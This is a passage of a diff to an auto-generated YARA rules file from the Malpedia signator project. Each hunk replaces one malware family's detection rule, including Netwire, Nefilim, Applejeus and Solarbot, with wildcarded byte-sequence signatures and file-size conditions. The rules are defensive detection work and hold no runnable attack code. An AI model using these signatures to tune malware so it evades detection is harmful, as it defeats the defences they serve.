a1???????? } + $sequence_2 = { 0108 833e00 7fc7 db46fc } + $sequence_3 = { 0105???????? 83c410 29442418 75a9 } + $sequence_4 = { 0108 833e00 7c1f 8b542410 } + $sequence_5 = { 0105???????? 83c410 29442420 75aa } + $sequence_6 = { 0108 833a00 7c23 8b442428 } + $sequence_7 = { 0108 833e00 7cc7 7e39 } + $sequence_8 = { c645da14 c645db14 e8???????? 83c40c 8d45d0 } + $sequence_9 = { c645de47 c645df5b c645e04d c645e160 c645e249 c645e346 c645e44c } + $sequence_10 = { 6a0a 50 e8???????? 83c40c 8d45f4 885dfd 50 } + $sequence_11 = { 8d7da0 f3ab 8d459c 50 ff15???????? } + $sequence_12 = { 3bf8 72ee 6880000000 56 ff15???????? } + $sequence_13 = { c645ac05 c645ad07 c645ae07 c645af0b c645b004 c645b10e c645b226 } + $sequence_14 = { 7506 46 47 3bf8 } + $sequence_15 = { 6a55 8d45b8 6a0c 50 c645b816 } condition: - 7 of them and filesize <303100 + 7 of them and filesize <1040384 } -rule MALPEDIA_Win_Felismus_Auto : FILE +rule MALPEDIA_Win_Netwire_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5818ed3f-2431-5f26-88a0-82a8f566adf3" + id = "7e349eff-bed6-58da-b13d-023150840eee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.felismus_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netwire_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "dea5875d596c4ef87d002c63282ac83d0f7df95527f5e0d6e66faa21ccc2e20e" + logic_hash = "d56dccb0a24c96c7c7e1e50a683192f0a074d28ee0f4b72f3b3f8446384ae89a" score = 75 quality = 75 tags = "FILE" @@ -174121,32 +176805,32 @@ rule MALPEDIA_Win_Felismus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8b35???????? 83c404 53 ffd6 8b442410 } - $sequence_1 = { 8b4e08 8b560c 89442418 8b4610 894c241c 89442424 } - $sequence_2 = { 89542410 8b5110 56 2be8 57 89542420 bb01000000 } - $sequence_3 = { 8d5640 8bfa f3ab 8b4618 33c9 85c0 7e24 } - $sequence_4 = { 66ab aa b940000000 33c0 8dbc24b1050000 } - $sequence_5 = { 85c0 740f 8d8c2414010000 68???????? 51 eb0d 8d942414010000 } - $sequence_6 = { 8b442424 50 56 ff15???????? 56 ff15???????? 83f8ff } - $sequence_7 = { 7cd0 8b461c 8bce 50 e8???????? 8b7e1c } - $sequence_8 = { 51 8bfb 83c9ff 33c0 895514 f2ae f7d1 } - $sequence_9 = { 83c408 85ff 742b 57 ff15???????? 83f816 7e1f } + $sequence_0 = { c7042449000000 e8???????? c7042446000000 e8???????? c7042400000000 e8???????? } + $sequence_1 = { c7042401000080 e8???????? c7042410000000 e8???????? } + $sequence_2 = { c744240c00000000 c744240800000000 c744240400000000 c7042408000000 e8???????? 83ec14 } + $sequence_3 = { 740c c7042400000000 e8???????? c70424???????? e8???????? } + $sequence_4 = { e8???????? a3???????? c7042440000000 e8???????? } + $sequence_5 = { c70424d0070000 e8???????? e9???????? e8???????? } + $sequence_6 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042408000000 e8???????? 83ec14 } + $sequence_7 = { c744242c00000000 c744242800000000 c744242400000000 c7442420fdffffff c744241c00000000 c744241800000000 } + $sequence_8 = { c7042400000000 e8???????? c70424???????? e8???????? } + $sequence_9 = { e8???????? eb11 c7042496000000 e8???????? } condition: - 7 of them and filesize <204800 + 7 of them and filesize <416768 } -rule MALPEDIA_Win_Urlzone_Auto : FILE +rule MALPEDIA_Win_Cookiebag_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73713fa1-9237-58d2-8cc2-5acf9c265fc9" + id = "c260d983-1fb1-5187-bb1e-a30d172d6701" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.urlzone_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cookiebag_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "4cce61429410ef9f511dc19a60899f126670164d7c8bb8ef8edba2014cda32d1" + logic_hash = "74595c8c00c27ebea5fcf6294fdb19b48126392d3364dc5a9bcc9f574cb25599" score = 75 quality = 75 tags = "FILE" @@ -174160,32 +176844,32 @@ rule MALPEDIA_Win_Urlzone_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7c32 80f839 7f05 80e830 eb22 } - $sequence_1 = { 80fc39 7f05 80ec30 eb22 } - $sequence_2 = { 7f05 80ec30 eb22 80fc41 7c54 } - $sequence_3 = { 80c00a eb10 80f861 7c11 80f866 } - $sequence_4 = { 5f 5e c3 57 51 89c7 } - $sequence_5 = { 80c40a eb10 80fc61 7c42 80f866 7f3d } - $sequence_6 = { 7f0c 80e861 80c00a c0e004 08e0 } - $sequence_7 = { 80f841 7c23 80f846 7f08 } - $sequence_8 = { 80f839 7f05 80e830 eb22 80f841 7c23 } - $sequence_9 = { 80ec30 eb22 80fc41 7c54 } + $sequence_0 = { 0f8e39050000 8a442437 bf???????? 88442424 83c9ff 33c0 33ed } + $sequence_1 = { 51 8b4c2414 55 e8???????? 84c0 7412 8b442418 } + $sequence_2 = { 51 e8???????? 83c404 eb1d 8b4608 8b7604 3bf3 } + $sequence_3 = { 50 53 52 e8???????? 8bce e8???????? 8b4c2428 } + $sequence_4 = { 83c1fe 51 e8???????? 83c404 8b4c242c 897c243c 3bcf } + $sequence_5 = { e8???????? 68???????? e8???????? 83c404 8bd8 8dbe14010000 6a01 } + $sequence_6 = { 895c2428 e8???????? 84c0 7427 8b7c2418 8bcd } + $sequence_7 = { 85c0 7454 8b87dc000000 85c0 764a 8b44240c } + $sequence_8 = { e8???????? 83c414 b001 5f 5e c20400 5f } + $sequence_9 = { 6a01 8d4c241c c7442444ffffffff e8???????? 8b4c2438 64890d00000000 } condition: - 7 of them and filesize <704512 + 7 of them and filesize <311296 } -rule MALPEDIA_Win_Spider_Rat_Auto : FILE +rule MALPEDIA_Win_Startpage_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8b8fb932-c9c0-5d1a-a1ff-94b4f85b8abe" + id = "bf47ff90-3238-555c-bf4a-537084ae22d6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spider_rat_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.startpage_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "86dc62debebef6e9c395034c4368c0804fc586029188907fa2c1533f611f9771" + logic_hash = "9dae8bd02cc42718a63c04f81edbd9a29e9f4300c24f882a2c1fba0669713697" score = 75 quality = 75 tags = "FILE" @@ -174199,32 +176883,32 @@ rule MALPEDIA_Win_Spider_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 4883c708 488b1f 488bd3 488d8c2490000000 e8???????? } - $sequence_1 = { 418bc3 4c8d5c2460 498b5b18 498b7328 498be3 5f c3 } - $sequence_2 = { 488b6c2438 488b742440 8958f0 488b07 4863cb 488b5c2430 c6040100 } - $sequence_3 = { e8???????? 488b4d70 4883c160 ff15???????? 90 488d05b726fbff eb00 } - $sequence_4 = { 84c0 7471 4885f6 7505 83fd01 7415 488b8f88000000 } - $sequence_5 = { 7458 6683fa01 7452 ff15???????? 4c8bc6 8bd5 0fb7cb } - $sequence_6 = { 7410 488b8f88000000 e8???????? 85c0 7802 33db 8bc3 } - $sequence_7 = { 498bd8 488bf2 488bf9 4d85c0 7430 4885d2 742b } - $sequence_8 = { ff15???????? 488bc8 e8???????? 488d15d3b00300 488bce 488905???????? ff15???????? } - $sequence_9 = { ba03000000 488d442440 448d4a61 448d42fe 4889442420 e8???????? } + $sequence_0 = { 8945ec 85db 740c 8b0b 85c9 7406 0fb701 } + $sequence_1 = { 83eb01 75f1 8b75f8 8b06 33c9 663b08 759d } + $sequence_2 = { 75f5 2bd1 d1fa 5b 52 ff7508 8bcf } + $sequence_3 = { 8901 89742410 eb06 8931 8b742410 8b44241c 85c0 } + $sequence_4 = { 8bec a1???????? 85c0 740e 50 e8???????? 8325????????00 } + $sequence_5 = { 722e 8b4dc0 40 3d00100000 721a f6c11f 759c } + $sequence_6 = { 8b03 8bfb 53 ff5004 8b7508 33c9 8bc3 } + $sequence_7 = { e8???????? 59 c645fc01 8b8de0feffff 83c1f0 e8???????? 51 } + $sequence_8 = { 755f 8a0a 8d4201 8907 80f975 7553 8b4db8 } + $sequence_9 = { 8907 50 50 8945fc ff35???????? ff31 } condition: - 7 of them and filesize <1107968 + 7 of them and filesize <2277376 } -rule MALPEDIA_Win_Blackbyte_Auto : FILE +rule MALPEDIA_Win_Nefilim_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ae2ced49-3989-5cc9-8c98-64c5f933a895" + id = "7c9bb815-6478-5f57-9a80-3013a8b5a537" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackbyte_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nefilim_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1cee2f7e2bce0af57e75d6fdf4454ccb725b7569d4236140429240d2a7df1fe9" + logic_hash = "0637c290ac474507dfbf7c46615faaf644551a1824ee3d111eec4b7aaf27ae12" score = 75 quality = 75 tags = "FILE" @@ -174238,38 +176922,32 @@ rule MALPEDIA_Win_Blackbyte_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d15bc010000 4889542478 4889842480000000 488d542478 4889942490000000 c644242701 } - $sequence_1 = { 488d0db4020000 488908 833d????????00 7520 488b4c2428 48894808 } - $sequence_2 = { 0fb64210 88442408 0fb64211 88442409 } - $sequence_3 = { 0fb6420b 8844240b 0fb6420c 8844240c 0fb6420d 8844240d 0fb6420e } - $sequence_4 = { 488d4a01 488b442428 488b5c2430 4883f903 } - $sequence_5 = { 0101 ffc5 3b6b68 0f82e6feffff } - $sequence_6 = { 488d542478 4889942490000000 c644242701 488b9c24a8000000 488b8c24b0000000 e8???????? } - $sequence_7 = { 488d4250 488b542430 488d5a50 b918000000 } - $sequence_8 = { 0fb6420d 8844240d 0fb6420e 8844240e 0fb6420f 8844240f } - $sequence_9 = { 488d542470 4889942488000000 c644241f01 488b9c24a0000000 } - $sequence_10 = { 488d4a01 488b442430 488b5c2438 90 4883f90f } - $sequence_11 = { 0fb64212 8844240a 0fb64213 8844240b } - $sequence_12 = { 0fb6420f 8844240f 488b442408 48894108 } - $sequence_13 = { 488d5c244b b902000000 0f1f440000 e8???????? } - $sequence_14 = { 014608 498bce ffd7 448b85e8040000 } - $sequence_15 = { 0fb64211 88442409 0fb64212 8844240a } + $sequence_0 = { be00010000 56 e8???????? 56 8944244c } + $sequence_1 = { 8945e4 3d00010000 7d10 8a8c181d010000 8888c0e64000 40 } + $sequence_2 = { c1f802 6bc003 50 6a00 ff15???????? 50 } + $sequence_3 = { 85c0 7506 ff15???????? 8d45d4 50 57 ffd3 } + $sequence_4 = { 397c2428 7304 8d442414 68???????? 50 ffd6 85c0 } + $sequence_5 = { 50 ffd6 85c0 0f84cf020000 f68424a000000010 8d8424cc000000 } + $sequence_6 = { 7421 68???????? 8d442444 e8???????? } + $sequence_7 = { 8b3d???????? 8b1d???????? 33c9 8945e4 894de8 8b45e4 d3e8 } + $sequence_8 = { 8944244c e8???????? ff74244c 8b542440 89442454 e8???????? } + $sequence_9 = { c745eceb7f4000 894df8 8945fc 64a100000000 8945e8 } condition: - 7 of them and filesize <9435136 + 7 of them and filesize <142336 } -rule MALPEDIA_Win_Badhatch_Auto : FILE +rule MALPEDIA_Win_Applejeus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e8145868-3ca1-5c30-b22c-ef0d5f024b54" + id = "2b213dd7-4b0e-53d6-9398-7bec043b88e3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badhatch_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.applejeus_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "a465c1cdccc061411fd4300f0446fb5369592ae409bf62acf36666de581c3980" + logic_hash = "0a3d67a5753a00f446b4f5eec17ef4a4499de52aeb8e82581c3d643c4e67e3d2" score = 75 quality = 75 tags = "FILE" @@ -174283,32 +176961,32 @@ rule MALPEDIA_Win_Badhatch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 6a00 50 ffd7 56 6a00 ff35???????? } - $sequence_1 = { 8b7730 59 59 8975f0 85f6 7514 } - $sequence_2 = { 8bc7 99 0145e0 1155e4 eb0e } - $sequence_3 = { ff7618 ff15???????? 85c0 740e ff15???????? 8945e4 e9???????? } - $sequence_4 = { 8bf0 59 85f6 750e eb40 ff15???????? 8bf0 } - $sequence_5 = { 8945e4 ff45d0 e9???????? 395de4 0f8574060000 68???????? ff7618 } - $sequence_6 = { 50 ff15???????? 85c0 0f8524010000 8d45ec 50 8d8594f5ffff } - $sequence_7 = { 8bd8 48 83e90c 85db 75f1 5b } - $sequence_8 = { 5e c9 c3 55 8bec 83e4f8 81ec38020000 } - $sequence_9 = { 50 ff15???????? 8945ec 3bc3 7509 } + $sequence_0 = { 8902 8b4608 8b08 8b4604 810044f3ffff 8100bc0c0000 } + $sequence_1 = { 8b4604 8b00 33c2 0f8583000000 c745f45b000000 8b45f4 83f032 } + $sequence_2 = { 8945dc 8d45d0 c745d0a08e4200 897dd4 8975d8 0f1145b0 } + $sequence_3 = { 8b4a04 50 0f1145c8 c745a8e0294200 0f1145d8 897dac 8975b0 } + $sequence_4 = { e8???????? 8b4dc8 83c414 8945cc 89851cffffff c700???????? 897004 } + $sequence_5 = { c745e400000000 8b410c 50 6a00 51 8b04851cfb4600 ffd0 } + $sequence_6 = { c68589f5ffff7d c6858af5ffff85 c6858bf5ffff72 c6858cf5ffff83 c6858df5ffff59 c6858ef5ffff3a c6858ff5ffff77 } + $sequence_7 = { 8d4db0 e9???????? 8d4db4 e9???????? 8d4dac e9???????? 8b542408 } + $sequence_8 = { e8???????? 8b7588 8d4d94 83c418 e8???????? c78568ffffffd5030000 8b8568ffffff } + $sequence_9 = { 8d85d42e0000 50 ff15???????? 57 ff15???????? e9???????? ff15???????? } condition: - 7 of them and filesize <156672 + 7 of them and filesize <1245184 } -rule MALPEDIA_Win_Lcpdot_Auto : FILE +rule MALPEDIA_Win_Micrass_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a95a9872-7a8a-5e4e-81d9-79280cf44b78" + id = "4db1798a-2c39-50c7-84da-46ea64acd353" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lcpdot_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.micrass_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "3aab7a93128b920a2310606f2af0b9275aa227850391bd4e2d60e74544bd69d0" + logic_hash = "9dffdea8c321d05076908df0f614e54842a8e7b97f4db09cebeac9dcb66ebdaa" score = 75 quality = 75 tags = "FILE" @@ -174322,37 +177000,32 @@ rule MALPEDIA_Win_Lcpdot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 } - $sequence_1 = { 85c9 0f848c000000 53 56 8b7208 } - $sequence_2 = { 6a01 52 56 8d8508feffff } - $sequence_3 = { e8???????? 85c0 752a 56 ff15???????? } - $sequence_4 = { ff24851e884000 838de8fdffffff 89b588fdffff 89b5bcfdffff } - $sequence_5 = { 90 488b4308 4885c0 743f 488b0d???????? 488d15ad4f0100 } - $sequence_6 = { ffd7 5f 5e c3 55 8bec 81ec400c0000 } - $sequence_7 = { 8d8d14f4ffff 51 ebd8 83c320 53 8bce e8???????? } - $sequence_8 = { 8b11 8b4228 53 ffd0 33c0 8d55e0 } - $sequence_9 = { 85c0 0f8514010000 4c8d2d0a2f0100 41b804010000 } - $sequence_10 = { 488d4c2430 e8???????? b920080000 e8???????? } - $sequence_11 = { 48894c2408 4881ec88000000 488d0df54d0100 ff15???????? } - $sequence_12 = { 488bd9 894110 bf04000000 3daa55aa55 7519 } - $sequence_13 = { 7409 488bcf ff15???????? 33c0 488b9c2470040000 488b8c2440040000 4833cc } - $sequence_14 = { 488d1d23de0000 488d3d24de0000 eb0e 488b03 4885c0 7402 ffd0 } + $sequence_0 = { 59 89442424 8d442408 6a50 } + $sequence_1 = { 66890c45c4cc4000 40 ebe8 33c0 8945e4 3d01010000 7d0d } + $sequence_2 = { 8dbdccfdffff a5 a5 a5 a5 } + $sequence_3 = { 6a06 89430c 8d4310 8d8984194000 5a 668b31 } + $sequence_4 = { 8d85f8afffff 6a00 50 e8???????? 68???????? 57 e8???????? } + $sequence_5 = { 53 8985b83fffff 8d85c03fffff 57 50 89bddc9fffff } + $sequence_6 = { 56 b9???????? 8bf2 2bc8 2bf0 8a1401 } + $sequence_7 = { 8985e4fbffff 6a05 59 be???????? } + $sequence_8 = { 50 c744244801010000 e8???????? 59 50 89442414 } + $sequence_9 = { 8bcb e8???????? 59 837e4400 57 bf???????? } condition: - 7 of them and filesize <257024 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Unidentified_006_Auto : FILE +rule MALPEDIA_Win_Graphsteel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d29f273-95a4-58bd-87cd-6ac677036b5c" + id = "5824e278-153d-5fe0-a214-d93680fdb8e7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_006_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphsteel_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "dd723dd2c53afa22a9c28d9c9c06ec724a63cc0cfcf78b59a425b4cdf0fd8bc1" + logic_hash = "0a7069cfdac89882eeae5b943786ae3bcce2789fc825f256679c381850fffe14" score = 75 quality = 75 tags = "FILE" @@ -174366,32 +177039,32 @@ rule MALPEDIA_Win_Unidentified_006_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3907 7417 833e00 7408 ff36 e8???????? 59 } - $sequence_1 = { 6a00 8d45fc 897dfc 50 8d45f8 50 6a00 } - $sequence_2 = { 85c9 7410 8b55f4 85d2 7409 e8???????? 894708 } - $sequence_3 = { 8bf0 57 56 e8???????? 83c410 33c0 } - $sequence_4 = { 85f6 7410 57 8b7d0c 2bf8 } - $sequence_5 = { 0fb6875c204000 47 03c6 83c603 25ff000000 } - $sequence_6 = { eb45 8b7510 85f6 743c } - $sequence_7 = { 8b4dfc 83c40c 8bf7 8bd7 85c9 7421 83ff0c } - $sequence_8 = { 33ff 53 ff15???????? 53 ff15???????? } - $sequence_9 = { 57 6a40 8bc2 33ff 6800300000 50 } + $sequence_0 = { e8???????? 488d7830 488b4c2440 0f1f4000 e8???????? 4889c3 488d05415b3900 } + $sequence_1 = { ffd0 488bb42428010000 488b942410020000 4885d2 0f8401010000 488b4c2450 488d1d88ae4400 } + $sequence_2 = { e9???????? a810 0f84f1000000 84d2 0f888c010000 8954245c 83fa0b } + $sequence_3 = { e8???????? e8???????? 90 31c9 488d150f198e00 870a 8b0d???????? } + $sequence_4 = { e9???????? 4c8b4c2468 4d85c9 0f84b1000000 4c8b9424d8030000 4d8b9a88000000 498b4b08 } + $sequence_5 = { e8???????? 4909c5 0fb603 83c05b a8fb 0f85a0000000 488b4340 } + $sequence_6 = { e9???????? 8b8424a0010000 4189d9 ba35000000 4c89e9 448b842498010000 41bf06000000 } + $sequence_7 = { e9???????? 4885f6 0f8520ffffff 4c8d742440 4889d9 4d8b4550 c744244001080000 } + $sequence_8 = { eb11 488d7830 488b9424e0000000 e8???????? 488b542438 48895050 488b542440 } + $sequence_9 = { e8???????? c644243507 488d05e3cc3300 488b9c24c8000000 488d4c2435 e8???????? 48c7400806000000 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <19812352 } -rule MALPEDIA_Win_Scarecrow_Auto : FILE +rule MALPEDIA_Win_Arefty_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "906ba1cc-dc26-55b9-8f54-7f06e242df8d" + id = "290417d3-5ee5-5229-8624-fd994b33b5b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scarecrow_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arefty_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "b5b9eded36bc33c6ab271290937feb85fda4ad16d7bb5dd0760ea465825b259d" + logic_hash = "f5f9e554cdcd0132916bd1281d9476767533aa9af2658a9193107a622555119f" score = 75 quality = 75 tags = "FILE" @@ -174405,32 +177078,32 @@ rule MALPEDIA_Win_Scarecrow_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7f9 85d2 743b 8b45f4 8d4f17 83c00b 99 } - $sequence_1 = { 74d9 eb57 99 f7ff 85d2 7450 8b4c2410 } - $sequence_2 = { c68574faffff00 c68575faffff4b c68576faffff40 c68577faffff0a c68578faffff40 c68579faffff6e c6857afaffff40 } - $sequence_3 = { c6855bfcffff05 c6855cfcffff20 c6855dfcffff08 c6855efcffff20 c6855ffcffff27 c68560fcffff20 } - $sequence_4 = { 7905 48 83c8fc 40 744a 8b4df4 8d4303 } - $sequence_5 = { 99 f7ff 85d2 752c 0f1f4000 8b859cf7ffff 99 } - $sequence_6 = { 0f84f7040000 8d4f03 c745f005000000 660f1f840000000000 c745f405f26700 8b45f4 99 } - $sequence_7 = { c645aa00 c645ab6b c645ac00 c645ad48 c645ae00 c645af00 c645b000 } - $sequence_8 = { c644246205 c644246347 c644246405 c64424655a c644246605 c644246727 c644246805 } - $sequence_9 = { 660f28b870024300 660f54f0 660f5cc6 660f59f4 660f5cf2 f20f58fe 660f59c4 } + $sequence_0 = { 57 e8???????? 83c404 83fbff 7407 53 } + $sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? } + $sequence_2 = { 680000a000 57 53 ff15???????? 85c0 } + $sequence_3 = { 680000a000 57 53 ff15???????? } + $sequence_4 = { 57 e8???????? 83c404 83fbff 7407 53 ff15???????? } + $sequence_5 = { ff15???????? 680000a000 e8???????? 8bf8 } + $sequence_6 = { 0fb6041e 50 8b07 68???????? 6a03 8d04b0 } + $sequence_7 = { 8b07 68???????? 6a03 8d04b0 50 e8???????? 46 } + $sequence_8 = { 50 53 ff15???????? 680000a000 e8???????? 8bf8 83c404 } + $sequence_9 = { 50 53 ff15???????? 680000a000 } condition: - 7 of them and filesize <501760 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Bughatch_Auto : FILE +rule MALPEDIA_Win_Dripion_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "35614cb3-a7b5-53cc-adaa-ae210fa4a880" + id = "89e91029-adf0-5373-91d6-441ac823d2ed" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bughatch_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dripion_auto.yar#L1-L108" license_url = "N/A" - logic_hash = "5b28b48c5896cf30a835a51ee080a086478b951d2bf5768e0498fb91c61b534d" + logic_hash = "6b099e3758909dfda12afb8709370979b2c037becc9af1305c25dce794b98386" score = 75 quality = 75 tags = "FILE" @@ -174444,32 +177117,32 @@ rule MALPEDIA_Win_Bughatch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 ff15???????? 68???????? 8d9594f7ffff 52 ff15???????? } - $sequence_1 = { 8d8594f7ffff 50 ff15???????? c745d80c000000 c745e001000000 c745dc00000000 8d4d94 } - $sequence_2 = { 52 6a00 8b45f8 50 ff15???????? 8945ec 837dec00 } - $sequence_3 = { 55 8bec 81ec30010000 c745e000000000 c745e860524000 } - $sequence_4 = { 894df4 8d55e4 52 8d4594 50 6a00 6a00 } - $sequence_5 = { 8b55ec 52 ff15???????? c745f801000000 8b45fc } - $sequence_6 = { 7308 8b45f8 8945f0 eb06 8b4d14 894df0 8b55f0 } - $sequence_7 = { ff15???????? 8b4de0 51 ff15???????? 8b45dc } - $sequence_8 = { 55 8bec 81ec60030000 837d0800 0f84d2000000 6a44 6a00 } - $sequence_9 = { e8???????? 83c40c 85c0 7407 c745fc01000000 8b45f8 50 } + $sequence_0 = { ffd6 8bf8 ffd6 0faff8 ffd6 } + $sequence_1 = { 03f8 7402 ffd6 ffd6 } + $sequence_2 = { ffd6 8bf8 ffd6 0faff8 8d3c7f } + $sequence_3 = { 03f8 ffd6 8bd8 ffd6 0fafd8 ffd6 } + $sequence_4 = { ffd6 03f8 8d3c7f ffd6 } + $sequence_5 = { 7513 6a64 ff15???????? 68???????? } + $sequence_6 = { 8bf8 ffd6 0faff8 8d3c7f } + $sequence_7 = { ffd6 03f8 ffd6 8bd8 } + $sequence_8 = { 7402 ffd6 ffd6 ffd6 } + $sequence_9 = { ffd6 03f8 7402 ffd6 } condition: - 7 of them and filesize <75776 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Lightneuron_Auto : FILE +rule MALPEDIA_Win_Solarbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "539cc86b-948c-5a39-97ed-a3902d358bcb" + id = "8e3c74e1-0da4-57ab-ab5f-74e62e2d1f7c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightneuron_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.solarbot_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "eb817806e099f7ab1d4d5a04d338d80185e8c65715cfe2e18f8deb16ab95898d" + logic_hash = "2b058f45b0c5077e371ef262d327c05a0be6ae89bd9fed8f4379a07e0dfd6a86" score = 75 quality = 75 tags = "FILE" @@ -174483,32 +177156,32 @@ rule MALPEDIA_Win_Lightneuron_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488d8c2434010000 33d2 41b800010000 89b42430010000 e8???????? 488bcf } - $sequence_1 = { 0f4ed9 3bc5 770b 3beb 7707 b801000000 eb02 } - $sequence_2 = { 85d2 7e24 488b8f80000000 e8???????? 488b8f80000000 4885c9 740c } - $sequence_3 = { e8???????? 8bf0 85c0 7502 893b 